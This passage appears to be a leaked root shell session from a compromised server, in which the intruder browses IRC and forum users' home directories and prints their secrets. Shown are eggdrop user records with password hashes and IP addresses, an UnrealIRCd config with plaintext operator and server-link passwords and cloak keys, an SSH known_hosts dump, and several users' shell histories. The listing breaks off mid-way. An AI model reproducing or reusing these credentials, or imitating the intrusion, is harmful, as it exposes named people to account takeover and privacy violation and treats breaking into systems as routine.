scripts/action.fix.tcl -source netbots/netbots.tcl -source scripts/http.tcl -source scripts/fsck.tcl -source scripts/news.tcl -source scripts/google.tcl -source scripts/pcheck.tcl -source scripts/dns.tcl -source scripts/movies.tcl -source scripts/userinfo.tcl -loadhelp userinfo.help -[root@demon2 egg]# cat eggdrop/v0ltr0n.user -#4v: eggdrop v1.6.18 -- V0LTR0N -- written Mon Apr 21 14:00:00 2008 -boneless - bfloN ---BOTADDR ts.g00ns.net:11800/11801 ---BOTFL ghp ---HOSTS *!boneless@ts.g00ns.net ---LASTON 1198721898 #g00ns ---XTRA created 1187476753 ---PASS 8bky9t3q4ey6t -sentry - bfloN ---HOSTS *!sentry@72.20.26.211 ---LASTON 1198721877 unlinked ---XTRA created 1187476804 ---BOTADDR 72.20.26.211:11800/11801 ---PASS f2w7bi713nyoxl -keebler - bfloN ---HOSTS *!keebler@72.20.26.212 ---LASTON 1198721898 unlinked ---XTRA created 1187476804 ---BOTADDR 72.20.26.212:11800/11801 ---PASS i347t6epn2 -v0ltr0n - bfloN ---HOSTS *!v0ltr0n@72.20.26.209 ---LASTON 1208758936 #priv ---XTRA created 1187476804 ---BOTADDR 72.20.26.209:11800/11801 ---PASS gcc8k5hi44w1 -Altaaf - hjlmnoptx ---HOSTS *!blackirc@blackirc.info ---HOSTS -telnet!*@* ---LASTON 1190453133 @boneless ---PASS +GviW90Qn.aQ0 ---XTRA created 1187300220 -c0ma - hjlmnoptx ---HOSTS *!*@n00b-pwner.com ---LASTON 1187920073 @boneless ---PASS +3EuN1.om33a. ---XTRA created 1187570739 -::#BlackIRC bans -::#priv bans -*exempt - - -% *!*@g00ns.net:+0:+1187835633:1190601012:c0ma:requested -&&#BlackIRC exempts -&&#priv exempts -$$#BlackIRC invites -$$#priv invites - -[root@demon2 egg]# ls -al eggdrop/v0ltr0n.notes --rw------- 1 egg egg 0 Apr 21 14:00 eggdrop/v0ltr0n.notes -[root@demon2 egg]# cd eggdrop/logs/ -[root@demon2 logs]# ls -al -total 84 -drwxrwxr-x 2 egg egg 4096 Apr 21 03:05 . -drwx------ 11 egg egg 4096 Apr 21 14:00 .. --rw-r--r-- 1 egg egg 411 Aug 13 2007 CONTENTS --rw-rw-r-- 1 egg egg 68581 Apr 21 14:15 eggdrop.log -[root@demon2 logs]# head eggdrop.log -[03:05] @#BlackIRC (+stn) : [m/1 o/1 h/0 v/0 n/0 b/0 e/0 I/0] -[03:05] @#priv (+tn) : [m/1 o/1 h/0 v/0 n/0 b/0 e/0 I/0] -[03:05] #HighTechHost (+trna) : [m/4 o/3 h/0 v/0 n/1 b/0 e/0 I/0] -[03:05] #g00ns (+trna) : [m/52 o/8 h/3 v/6 n/35 b/12 e/0 I/0] -[03:05] #HighTechHost (+tn) : [m/26 o/24 h/0 v/0 n/2 b/0 e/0 I/0] -[03:05] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0] -[03:05] #HighTechHost (+tn) : [m/26 o/24 h/0 v/0 n/2 b/0 e/0 I/0] -[03:05] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0] -[03:10] #HighTechHost (+trna) : [m/4 o/3 h/0 v/0 n/1 b/0 e/0 I/0] -[03:10] #g00ns (+trna) : [m/52 o/8 h/3 v/6 n/35 b/12 e/0 I/0] -[root@demon2 logs]# tail eggdrop.log -[14:10] #HighTechHost (+tn) : [m/26 o/23 h/0 v/0 n/3 b/0 e/0 I/0] -[14:10] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0] -[14:15] #HighTechHost (+tn) : [m/26 o/23 h/0 v/0 n/3 b/0 e/0 I/0] -[14:15] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0] -[14:15] @#BlackIRC (+stn) : [m/1 o/1 h/0 v/0 n/0 b/0 e/0 I/0] -[14:15] @#priv (+tn) : [m/2 o/1 h/0 v/0 n/1 b/0 e/0 I/0] -[14:15] #HighTechHost (+tn) : [m/26 o/23 h/0 v/0 n/3 b/0 e/0 I/0] -[14:15] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0] -[14:15] #HighTechHost (+trna) : [m/4 o/3 h/0 v/0 n/1 b/0 e/0 I/0] -[14:15] #g00ns (+trna) : [m/57 o/10 h/3 v/10 n/34 b/12 e/0 I/0] -[root@demon2 logs]# cd .. -[root@demon2 eggdrop]# cd /home -[root@demon2 home]# cd evilcode -[root@demon2 evilcode]# ls -al -total 148 -drwxr-xr-x 9 evilcode evilcode 4096 Mar 25 13:40 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. -drwx------ 2 evilcode evilcode 4096 Aug 1 2007 backups --rw------- 1 evilcode evilcode 6456 Apr 19 11:25 .bash_history --rw-r--r-- 1 evilcode evilcode 304 Apr 29 2006 .bash_logout --rw-r--r-- 1 evilcode evilcode 191 Apr 29 2006 .bash_profile --rw-r--r-- 1 evilcode evilcode 124 Apr 29 2006 .bashrc -drwx--x--x 3 evilcode evilcode 4096 Apr 29 2006 domains --rw-r--r-- 1 evilcode evilcode 383 Apr 29 2006 .emacs -drwxrwx--- 3 evilcode evilcode 4096 Aug 1 2007 imap -drwxrwxr-x 2 evilcode evilcode 4096 Aug 8 2007 index0r_img --rw-rw-r-- 1 evilcode evilcode 22825 Feb 24 2007 index.php --rw-rw-r-- 1 evilcode evilcode 51019 Feb 24 2007 i.zip -drwx------ 2 evilcode evilcode 4096 Aug 1 2007 mail -drwxrwxr-x 3 evilcode evilcode 4096 Mar 25 13:44 newircd -lrwxrwxrwx 1 evilcode evilcode 36 Aug 1 2007 public_html -> ./domains/evilcoders.net/public_html --rw-r----- 1 evilcode mail 34 Aug 7 2007 .shadow -drwx------ 13 evilcode evilcode 4096 Mar 25 13:44 Unreal3.2 -[root@demon2 evilcode]# cd ../excodeirc -[root@demon2 excodeirc]# ls -al -total 65128 -drwx--x--x 25 excodeirc excodeirc 4096 Apr 14 22:26 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. -drwxrwxr-x 7 excodeirc excodeirc 4096 May 27 2006 anope-1.6.4 --rw-rw-r-- 1 excodeirc excodeirc 3840000 Sep 8 2005 anope-1.6.4.tar -drwxr-xr-x 7 excodeirc excodeirc 4096 Jun 19 2007 anope-1.7.19 --rw-rw-r-- 1 excodeirc excodeirc 1505639 Jun 10 2007 anope-1.7.19.tar.gz -drwxrwxr-x 2 excodeirc excodeirc 4096 Feb 10 12:47 back -drwx------ 2 excodeirc excodeirc 4096 Aug 1 2007 backups --rw------- 1 excodeirc excodeirc 11324 Apr 14 23:11 .bash_history --rw-r--r-- 1 excodeirc excodeirc 304 Apr 28 2006 .bash_logout --rw-r--r-- 1 excodeirc excodeirc 191 Apr 28 2006 .bash_profile --rw-r--r-- 1 excodeirc excodeirc 124 Apr 28 2006 .bashrc -drwxr-xr-x 4 excodeirc excodeirc 4096 Mar 25 19:58 defender -drwx--x--x 5 excodeirc excodeirc 4096 Mar 17 18:08 domains -drwxrwxr-x 10 excodeirc excodeirc 4096 Mar 22 20:57 eggdrop -drwx------ 2 excodeirc excodeirc 4096 Jun 25 2007 .elinks --rw-r--r-- 1 excodeirc excodeirc 383 Apr 28 2006 .emacs -drwxr-xr-x 3 root root 4096 Mar 22 20:56 hightechhost -drwxrwx--- 5 excodeirc mail 4096 Mar 17 18:08 imap --rw-rw-r-- 1 excodeirc excodeirc 13375456 Jun 17 2007 ircbackup.tar.gz -drwxrw-r-- 2 excodeirc excodeirc 4096 Jul 15 2007 .linuxcounter --rwxr-xr-x 1 excodeirc excodeirc 36620 Jan 21 2007 machine-update -drwx------ 2 excodeirc excodeirc 4096 Mar 17 18:08 mail -drwxrwxr-x 9 excodeirc excodeirc 4096 Jan 15 20:23 NeoStats3.0 --rw-rw-r-- 1 excodeirc excodeirc 32491520 Sep 2 2006 neostatsbackup.tar -drwxrwxr-x 5 excodeirc excodeirc 4096 Apr 30 2006 OPSB-3.0.a3 --rw-rw-r-- 1 excodeirc excodeirc 1464320 Dec 13 2005 OPSB-3.0.a3.tar -lrwxrwxrwx 1 excodeirc excodeirc 43 Aug 1 2007 public_html -> ./domains/irc.exploitercode.com/public_html -drwxr-xr-x 4 excodeirc g00ns83 4096 Nov 30 14:27 randword-3.2 -drwxrwxr-x 5 excodeirc excodeirc 4096 Apr 30 2006 SecureServ-3.0.a3 --rw-rw-r-- 1 excodeirc excodeirc 1904640 Dec 13 2005 SecureServ-3.0.a3.tar -drwxrwxr-x 6 excodeirc excodeirc 4096 Dec 2 17:27 services -drwxrwxr-x 7 excodeirc excodeirc 4096 Jun 19 2007 servicesnew --rw-r----- 1 excodeirc mail 34 Sep 17 2007 .shadow -drwx------ 2 excodeirc excodeirc 4096 Dec 3 2006 .ssh -drwxrwxrwx 13 excodeirc excodeirc 4096 Apr 30 2006 trunk --rw-rw-r-- 1 excodeirc excodeirc 9197056 Apr 30 2006 trunk.tar -drwx------ 13 excodeirc excodeirc 4096 Apr 14 22:26 Unreal3.2 --rw-rw-r-- 1 excodeirc excodeirc 2629222 Feb 18 2007 Unreal3.2.6.tar.gz -drwx------ 13 excodeirc excodeirc 4096 Feb 10 12:43 Unrealfuck -drwx------ 13 excodeirc excodeirc 4096 Jun 17 2007 unrealold -[root@demon2 excodeirc]# head .bash_history -exit -cd -ls -cd Ur* -cd Un* -nano 0w unreal* -nano -w unreal* -nano -w unrealircd* -./unreal restart -ps ax -[root@demon2 excodeirc]# tail .bash_history -ls -cd services -ls -nano services.conf -cd /home/excodeirc -ls -cd anope-1.7.19 -ls -cd /home/excodeirc -su -[root@demon2 excodeirc]# ls -al .ssh -total 12 -drwx------ 2 excodeirc excodeirc 4096 Dec 3 2006 . -drwx--x--x 25 excodeirc excodeirc 4096 Apr 14 22:26 .. --rw-r--r-- 1 excodeirc excodeirc 395 Dec 3 2006 known_hosts -[root@demon2 excodeirc]# cat .ssh/* -75.126.51.154 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAm215adR0bmHDNKkjOQeI/ -yN0P+F95L7z5Wjcp2JSs9fy2tZjFys6QIu9Pfuy6rQdkAayiTR1xXgh7+JTIWdJOW6I8jF8 -nT1tQGmf1mT9s0P8cKtIJSMit+Ld78ZO+sC7e44YUqgn01zr6P7moPLE+Q5xIrZBzu49Yuw -dzqacaLso8CnbsQDiM+gWvk7jd1Ox4PPjQYTzHX5fSxC1RrNI9GsRhb//i503HVIRLvjn1n -wO1QBtHnqEhyYJD4VDLWXDkBqBHr2OQCzu8ex1UwoJ3j/ZxPYcQ49sbDkWaUpo7LMdsxvoA -QE7igDNKDX0a2LJm2U1q7uwrwtmjYwJcKkmXw== -[root@demon2 excodeirc]# ls -al eggdrop/*.conf --rw-r--r-- 1 excodeirc excodeirc 51580 Mar 22 20:57 eggdrop/eggdrop.conf -[root@demon2 excodeirc]# cd Unreal3.2 - -Don't mind us, we're gonna cut out some crap like -default comments from the unrealircd.conf - - -[root@demon2 Unreal3.2]# cat unrealircd.conf -loadmodule "src/modules/commands.so"; -loadmodule "src/modules/cloak.so"; -loadmodule "src/modules/m_getinfo.so"; -loadmodule "src/modules/hideserver.so"; -#loadmodule "src/modules/operpasswd.so"; - -include "spamfilter.conf"; - -me -{ - name "p.60z.org"; - info "Let the good times roll"; - numeric 12; -}; - -admin { - "pr0be"; - "pr0be@g00ns.net"; -}; - -class clients -{ - pingfreq 180; - maxclients 5000; - sendq 1000000000; - recvq 8000; -}; - -class servers -{ - pingfreq 290; - maxclients 100; /* Max servers we can have linked at a -time */ - sendq 999999999; - connfreq 100000; /* How many seconds between each connection -attempt */ -}; - -oper pr0be { - from { - userhost "*@*"; - }; - password "spiggers666"; - class "default"; - flags { - netadmin; - services-admin; - global; - helpop; - can_rehash - can_globalnotice; - can_globalroute; - can_globops; - can_wallops; - can_unkline; - can_kline; - can_globalkill; - can_zline; - can_gkline; - can_gzline; - get_umodew; - get_host; - can_override; - can_die; - can_restart; - }; -}; - - -oper sCuZz { - from { - userhost "*@*"; - }; - password "!beanerl0ve!"; - class "default"; - flags { - netadmin; - services-admin; - global; - helpop; - can_rehash - can_globalnotice; - can_globalroute; - can_globops; - can_wallops; - can_unkline; - can_kline; - can_globalkill; - can_zline; - can_gkline; - can_gzline; - get_umodew; - get_host; - can_override; - can_die; - can_restart; - }; -}; - - -oper Genocide { - from { - userhost "*@*"; - }; - password "s,7B0L=QEtaS"; - class "default"; - flags { - netadmin; - services-admin; - global; - helpop; - can_rehash - can_globalnotice; - can_globalroute; - can_globops; - can_wallops; - can_unkline; - can_kline; - can_globalkill; - can_zline; - can_gkline; - can_gzline; - get_umodew; - get_host; - can_override; - can_die; - can_restart; - }; -}; -allow { - ip *@*; - hostname *@*; - class clients; - maxperip 15; -}; - -listen 72.20.26.210:6667; -listen 127.0.0.1:6667; -listen 72.20.26.210:6697 { - options { - ssl; - clientsonly; - }; -}; -listen 72.20.26.210:16969 { - options { - ssl; - serversonly; - }; -}; - -except tkl { - mask uid0@208.98.32.*; - type { - gline; - gzline; - qline; - gqline; - shun; - }; -}; - -/* -link partyvan.us.hub -{ - username *; - hostname 67.207.136.217 ; - bind-ip *; - port 10200; - hub *; - password-connect "oisdkgasdgweeab00"; - password-receive "oisdkgasdgweeab00"; - class servers; - options { - autoconnect; -# zip; - ssl; -# nohostcheck; - }; -}; -link lulz.hub -{ - username *; - hostname 209.62.62.142; - bind-ip *; - port 16969; - hub *; - password-connect "blarghh65vjh97t8c7hst8"; - password-receive "blarghh65vjh97t8c7hst8"; - class servers; - options { - autoconnect; - ssl; -}; -}; - - - -link irc.evilcoders.net -{ - username *; - hostname 72.20.26.213; - bind-ip *; - port 6667; - hub *; - password-connect "dei8hw0u"; - password-receive "dei8hw0u"; - class servers; - options { - autoconnect; -# zip; - nohostcheck; - }; -}; - -*/ -ulines { -#anonymous.services; -s.60z.org; -#partyvan.us.hub -#defender.exploitercode.net; -#irc.evilcoders.net; -#stats.exploitercode.net; -#uid0equalsroot.exploitercode.com; -}; - -hideserver -{ - - disable-map yes; - - disable-links yes; - - map-deny-message "*** Command /map is disabled for security reasons"; - links-deny-message "*** Command /links is disabled for security reasons"; - - hide - { - irc.exploitercode.net; - irc.g00ns.net; - s.60z.org; - }; -}; - -deny channel { - channel "oreos"; - reason "Grow up"; -}; - -ban nick { - mask "PwNd-*"; - reason "bots"; -}; - -/* Network configuration */ -set { - network-name "goodtimes"; - default-server "irc.exploitercode.net"; - services-server "s.60z.org"; -# stats-server "stats.exploitercode.net"; - help-channel "#Help"; - hiddenhost-prefix "aintgay"; - /* prefix-quit "no"; */ - cloak-keys { - qofdie998H99mF97f97MF9; - myc886C8V7tmv87tmvcM6C; - 42ZA643ZXn6745eC87r6VM; - - }; - /* on-oper host */ - hosts { - local "LocOp.exploitercode.net"; - global "IRCOp.exploitercode.net"; - coadmin "CoAdmin.exploitercode.net"; - admin "Admin.exploitercode.net"; - servicesadmin "CsOps.exploitercode.net"; - netadmin "NetAdmin.exploitercode.net"; - host-on-oper-up "no"; - }; -}; - -/* Server specific configuration */ - -set { - kline-address "uid0@exploitercode.net"; - modes-on-connect "+x"; - modes-on-oper "+xwgs"; - oper-auto-join "#spk"; - dns { - nameserver 127.0.0.1; - timeout 2s; - retries 2; - }; - options { - hide-ulines; - /* You can enable ident checking here if you want */ - /* identd-check; */ - show-connect-info; - }; - - maxchannelsperuser 1000000; - /* The minimum time a user must be connected before being -allowed to use a QUIT -message, - * This will hopefully help stop spam */ - anti-spam-quit-message-time 10s; - oper-only-stats "okfGsMRUEelLCXzdD"; - - /* Throttling: this example sets a limit of 3 connections per -60s (per host). */ - throttle { - connections 3; - period 60s; - }; - - /* Anti flood protection */ - anti-flood { - nick-flood 3:60; /* 3 nickchanges per 60 seconds -(the default) */ - }; - - /* Spam filter */ - spamfilter { - ban-time 1d; /* default duration of a *line ban set by -spamfilter */ - ban-reason "Spam/Advertising"; /* default reason */ - virus-help-channel "#help"; /* channel to use for -'viruschan' action */ - /* except "#help"; channel to exempt from filtering */ - - }; - -}; -[root@demon2 Unreal3.2]# cd .. -[root@demon2 excodeirc]# cd services -[root@demon2 services]# ls -backups dbz.zip hosts.db listnicks news.db services tables.sql -bot.db example.conf languages logs nick.db services.chk -chan.db exception.db listchans modules oper.db services.conf -[root@demon2 services]# -[root@demon2 services]# cd /home/felosi -[root@demon2 felosi]# ls -al -total 91140 -drwx--x--x 7 felosi felosi 4096 Feb 10 12:51 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. --rw-r--r-- 1 felosi felosi 72806123 Oct 5 2007 backup-10.5.2007_21-30-03_hywdinfo.tar.gz --rw------- 1 felosi felosi 403 Dec 28 11:46 .bash_history --rw-r--r-- 1 felosi felosi 24 Aug 3 2007 .bash_logout --rw-r--r-- 1 felosi felosi 176 Aug 3 2007 .bash_profile --rw-r--r-- 1 felosi felosi 124 Aug 3 2007 .bashrc --rw-rw-r-- 1 felosi felosi 6136 Aug 29 2007 da.cpanel.import.9beta2.tar.gz --rwxrwxrwx 1 felosi felosi 20561 Aug 29 2007 da.cpanel.import.pl --rwxrwxrwx 1 felosi felosi 280 Oct 5 2007 defaults.conf -drwx--x--x 5 felosi felosi 4096 Aug 3 2007 domains --rw-r----- 1 felosi felosi 20324841 Nov 12 16:31 earn.tar.gz -drwxrwxr-x 2 felosi felosi 4096 Oct 5 2007 export -drwxrwxr-x 2 felosi felosi 4096 Oct 5 2007 import --rw-r----- 1 felosi mail 34 Aug 3 2007 .shadow -drwx--x--x 2 felosi felosi 4096 Dec 28 11:35 user_backups -drwxr-xr-x 3 felosi felosi 4096 Dec 13 22:41 webmail -[root@demon2 felosi]# cat .bash_history -cd -ls -wget http://kade.nu/da/da.cpanel.import.9beta2.tar.gz -tar zxvf da.cpanel.import.9beta2.tar.gz -chmod 777 da.cpanel.import.pl defaults.conf -mkdir import export -nano -w defaults.conf -ls -ls -ls -ls import -ls user* -ls -cp backup-10.5.2007_21-30-03_hywdinfo.tar.gz import -per *.pl -perl *.pl -cd export -ls -cp hywdinfo.tar.gz ../user_backups -ls -cd ../user_backups -ls -exit -cd -cd user_* -ls -ls -ftp sph1.net -exit -[root@demon2 felosi]# cd ../felosii -[root@demon2 felosii]# ls -al -total 48 -drwx--x--x 6 felosii felosii 4096 Aug 1 2007 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. -drwx------ 2 felosii felosii 4096 Aug 1 2007 backups --rw-r--r-- 1 felosii felosii 24 Jun 30 2007 .bash_logout --rw-r--r-- 1 felosii felosii 191 Jun 30 2007 .bash_profile --rw-r--r-- 1 felosii felosii 124 Jun 30 2007 .bashrc -drwx--x--x 3 felosii felosii 4096 Jun 30 2007 domains --rw-r--r-- 1 felosii felosii 383 Jun 30 2007 .emacs -drwxrwx--- 3 felosii felosii 4096 Aug 1 2007 imap -drwx------ 2 felosii felosii 4096 Aug 1 2007 mail -lrwxrwxrwx 1 felosii felosii 36 Aug 1 2007 public_html -> ./domains/felosi-inc.net/public_html --rw-r----- 1 felosii mail 34 Jun 30 2007 .shadow -[root@demon2 felosii]# cd ../g00ns83 -[root@demon2 g00ns83]# ls -al -total 64 -drwx--x--x 9 g00ns83 g00ns83 4096 Apr 18 21:47 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. -drwxrwxr-x 4 g00ns83 g00ns83 4096 Apr 18 21:52 backup -drwx------ 2 g00ns83 g00ns83 4096 Aug 2 2007 backups --rw------- 1 g00ns83 g00ns83 2218 Dec 30 11:59 .bash_history --rw-r--r-- 1 g00ns83 g00ns83 24 Aug 2 2007 .bash_logout --rw-r--r-- 1 g00ns83 g00ns83 176 Aug 2 2007 .bash_profile --rw-r--r-- 1 g00ns83 g00ns83 124 Aug 2 2007 .bashrc --rw------- 1 g00ns83 g00ns83 232 Apr 18 21:47 .clipboard.txt -drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 domains -drwxrwx--- 3 g00ns83 g00ns83 4096 Aug 2 2007 imap -drwx------ 2 g00ns83 g00ns83 4096 Aug 2 2007 mail -drwxrwx--- 15 g00ns83 g00ns83 4096 Aug 2 2007 Maildir -lrwxrwxrwx 1 g00ns83 g00ns83 37 Aug 2 2007 public_html -> ./domains/g00ns-forum.net/public_html --rw-r----- 1 g00ns83 mail 34 Mar 7 19:56 .shadow -drwxr-xr-x 3 g00ns83 g00ns83 4096 Jan 29 11:45 webmail -[root@demon2 g00ns83]# cat .bash_history -cd -cd public_html -ls -mv index.html indexold -nano -w includes/config.php -exit -id -mc -exit -ls -find c99 -cd public_html -ls -ls admin1cp/ -ls -ls arc -ls archive -ls clientscript -ls donations -ls customavatars/ -ls wls -ls nex -mkdir /home/g00ns83/backup -mv nex/Seminar2.rar /home/g00ns83/backup -ls -ls nex -rm -rf nex -ls -ls spic -mv omg.html /home/g00ns83/backup -ls -nano in.php -nano indexold -mv indexold /home/g00ns83/backup -ls -ls hax -rm -rf hax -ls -nano calendar.php -mv sawnmapscan /home/g00ns83/backup -ls -nano sn00gnews.php -nano vboutput1.php -ls signaturepics/ -ls signaturepics/signaturepics/ -nano report.php -nano online.php -nano technews.php -nano sendmail -ls images1 -mv index.html indx.html -ls -mv oldlayout /home/g00ns83/backup -ls -nano license -nano image.php -ls wls -ls uploads -ls tutorials/ -nano downloads.php -ls -nano in.php -nano login.php -ls includes -cd includes -ls -nano index.html -ls -nano config.php.new -nano config.php.new.bak -nano functions_bigthree.php -nano modfunctions.php -nano functions.php -cd /home/g00ns83/public_html -ls -ls -nano mysql -nano secnews.php -nano site_members.php -mv site_members.php /home/g00ns83/backup -ls -ls z3r0 -ls -ls fusion -ls /home/g00ns83/backup -ls images1 -mv images1 /home/g00ns83/backup -ls -ls botnets -mv sn00gnews.php /home/g00ns83/backup -ls -nano secnews.php -nano vboutput1.php -cd / -ls -cd home -ls -cd /home/g00ns83 -ls -w -/var/spool/mail/g00ns83 -whoami -uname -a ; id -who -users -nano index.ph -nano index.php -ls -cd public_html/ -ls -nano index.php -nano index.php -ls -nano fusion -cd fusion -ls -cd $home -ls -cd public_html/ -echo $home -ls -ls wls -nano wls/index.html -rm wls/index.html -ls -chmod 0644 wls -ls -chmod 777 wls -ls -mv wls /home/g00ns83/backup -ls -nano online.php -nano faq.php -rm favicon.ico -ls -ls -ls -lsls -ls -mv mysql /home/g00ns83/backup -user -users -ls -ls -ls -uptime -users -cd -cd public_html/includes -nano -w config.php -top -exit -cd -cd public_html -mkdir sec -cd sec -wget http://phpsec.org/projects/phpsecinfo/phpsecinfo.zip -unaip *.zip -unzip *.zip -mv phpsecinfo-20070406 php -rm -rf php -exit -cd -cd public_html/includes -nano -w config.php -chown root:root config.php -pwd -exit -cd -cd public_html -cd includes -nano config.php -nano config.php -nano config.php -exit -cd -exit -wget http://13337.org/sem.zip -su sn00g3s -[root@demon2 g00ns83]# ls -al public_html/ -total 1980 -drwx--x--x 33 g00ns83 g00ns83 4096 Apr 18 21:47 . -drwxr-xr-x 8 g00ns83 g00ns83 4096 Apr 18 21:38 .. --rw-r--r-- 1 g00ns83 g00ns83 9058 Apr 18 21:46 404.shtml -drwxr-xr-x 4 g00ns83 g00ns83 4096 Aug 2 2007 admin1cp --rw-r--r-- 1 g00ns83 g00ns83 15770 Jun 19 2007 ajax.php --rw-rw-r-- 1 g00ns83 g00ns83 16362 Jun 19 2007 announcement.php -drwxr-xr-x 6 g00ns83 g00ns83 4096 Oct 28 09:25 anymedia --rw-r--r-- 1 g00ns83 g00ns83 81511 Apr 16 21:48 arcade.php -drwxrwxr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 archive --rw-rw-r-- 1 g00ns83 g00ns83 453 May 11 2005 arrow.jpg --rw-rw-r-- 1 g00ns83 g00ns83 15360 Jun 19 2007 attachment.php -drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 22 2007 ava -drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 botnets --rw-rw-r-- 1 g00ns83 g00ns83 74718 Jun 19 2007 calendar.php -drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 cgi-bin --rw-rw-r-- 1 g00ns83 g00ns83 43 Jun 19 2007 clear.gif -drwxrwxr-x 5 g00ns83 g00ns83 4096 Oct 28 09:26 clientscript -drwxrwxr-x 8 g00ns83 g00ns83 4096 Aug 2 2007 cpstyles --rw-rw-r-- 1 g00ns83 g00ns83 3266 Jun 19 2007 cron.php -drwxrwxr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 customavatars -drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 customprofilepics -drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 donations -drwxrwxr-x 5 g00ns83 g00ns83 73728 Feb 17 16:23 downloads --rwxrwxr-x 1 g00ns83 g00ns83 70283 Aug 11 2006 downloads.php --rw-rw-r-- 1 g00ns83 g00ns83 44375 Jun 19 2007 editpost.php --rw-rw-r-- 1 g00ns83 g00ns83 28539 Jun 19 2007 external.php --rw-rw-r-- 1 g00ns83 g00ns83 9213 Jun 19 2007 faq.php --rw-r--r-- 1 g00ns83 g00ns83 1150 Aug 2 2007 favicon.ico --rw-r--r-- 1 g00ns83 g00ns83 1150 Sep 29 2006 favicon.ico.1 --rw-r--r-- 1 g00ns83 g00ns83 33531 Apr 1 2006 fbi.gif --rw-rw-r-- 1 g00ns83 g00ns83 33023 Jun 19 2007 forumdisplay.php --rw------- 1 g00ns83 g00ns83 16 Feb 16 2007 .ftpquota -drwxr-xr-x 15 g00ns83 g00ns83 4096 Aug 2 2007 fusion -drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 games --rw-rw-r-- 1 g00ns83 g00ns83 28532 Jun 19 2007 global.php --rw-r--r-- 1 g00ns83 g00ns83 4106 Apr 15 23:41 header.png --rw-rw-r-- 1 g00ns83 g00ns83 314 Dec 8 12:49 .htaccess --rw-rw-r-- 1 g00ns83 g00ns83 31 May 13 2005 .htaccessy --rw-rw-r-- 1 g00ns83 g00ns83 908 May 11 2005 i.jpg -drwxr-xr-x 2 g00ns83 root 4096 Dec 16 16:13 image --rw-rw-r-- 1 g00ns83 g00ns83 7006 Jun 19 2007 image.php -drwxr-xr-x 19 g00ns83 g00ns83 4096 Apr 16 20:18 images -drwxrwxr-x 7 g00ns83 g00ns83 4096 Apr 11 17:00 includes --rw-rw-r-- 1 g00ns83 g00ns83 17826 Dec 16 12:16 index.php --rw-r--r-- 1 g00ns83 g00ns83 43378 Jun 19 2007 infraction.php --rw-r--r-- 1 g00ns83 g00ns83 136603 Jun 19 2007 inlinemod.php --rw-r--r-- 1 g00ns83 g00ns83 18 Jun 13 2007 in.php --rw-rw-r-- 1 g00ns83 g00ns83 10290 Jun 19 2007 joinrequests.php -drwxr-xr-x 2 g00ns83 g00ns83 4096 Apr 15 22:46 katalyst --rw-r--r-- 1 g00ns83 g00ns83 8222 Jun 19 2007 LICENSER --rw-rw-r-- 1 g00ns83 g00ns83 9726 Feb 7 19:36 login.php -drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 lolppp --rw-rw-r-- 1 g00ns83 g00ns83 34113 Jun 19 2007 memberlist.php --rw-rw-r-- 1 g00ns83 g00ns83 29733 Jun 19 2007 member.php --rw-rw-r-- 1 g00ns83 g00ns83 23300 Jun 19 2007 misc.php -drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 mod1cp --rw-r--r-- 1 g00ns83 g00ns83 27560 Jun 19 2007 moderation.php --rw-rw-r-- 1 g00ns83 g00ns83 6705 Jun 19 2007 moderator.php --rw-rw-r-- 1 g00ns83 g00ns83 18056 Jun 19 2007 newattachment.php --rw-rw-r-- 1 g00ns83 g00ns83 35434 Jun 19 2007 newreply.php --rw-rw-r-- 1 g00ns83 g00ns83 16942 Jun 19 2007 newthread.php -drwxr-xr-x 8 g00ns83 g00ns83 4096 Aug 2 2007 oldlayout --rw-rw-r-- 1 g00ns83 g00ns83 19955 Jun 19 2007 online.php --rw-r--r-- 1 g00ns83 g00ns83 7398 Jun 19 2007 payment_gateway.php --rw-r--r-- 1 g00ns83 g00ns83 11724 Jun 19 2007 payments.php -drwxr-xr-x 2 g00ns83 g00ns83 4096 Oct 28 09:27 players --rw-rw-r-- 1 g00ns83 g00ns83 26065 Jun 19 2007 poll.php --rw-rw-r-- 1 g00ns83 g00ns83 72004 Jun 19 2007 postings.php --rw-rw-r-- 1 g00ns83 g00ns83 6568 Jun 19 2007 printthread.php --rw-rw-r-- 1 g00ns83 g00ns83 55163 Jun 19 2007 private.php --rw-rw-r-- 1 g00ns83 g00ns83 94525 Jun 19 2007 profile.php --rw-r--r-- 1 g00ns83 g00ns83 4188 Feb 14 2006 referrals.php --rw-rw-r-- 1 g00ns83 g00ns83 468 May 11 2005 refresh.jpg --rw-rw-r-- 1 g00ns83 g00ns83 38457 Jun 19 2007 register.php --rw-rw-r-- 1 g00ns83 g00ns83 14498 Jun 19 2007 report.php --rw-rw-r-- 1 g00ns83 g00ns83 13433 Jun 19 2007 reputation.php --rwxrwxrwx 1 g00ns83 g00ns83 0 Sep 17 2007 scast_home.xml -drwxr-xr-x 2 g00ns83 root 4096 Dec 6 2003 script --rw-rw-r-- 1 g00ns83 g00ns83 115978 Jun 19 2007 search.php -drwxrwxr-x 2 g00ns83 g00ns83 4096 Aug 8 2007 sec --rw-r--r-- 1 g00ns83 g00ns83 61 Jun 10 2006 secnews.php --rw-r--r-- 1 g00ns83 g00ns83 10524 Apr 6 2007 sendmail --rw-rw-r-- 1 g00ns83 g00ns83 20225 Jun 19 2007 sendmessage.php --rw-rw-r-- 1 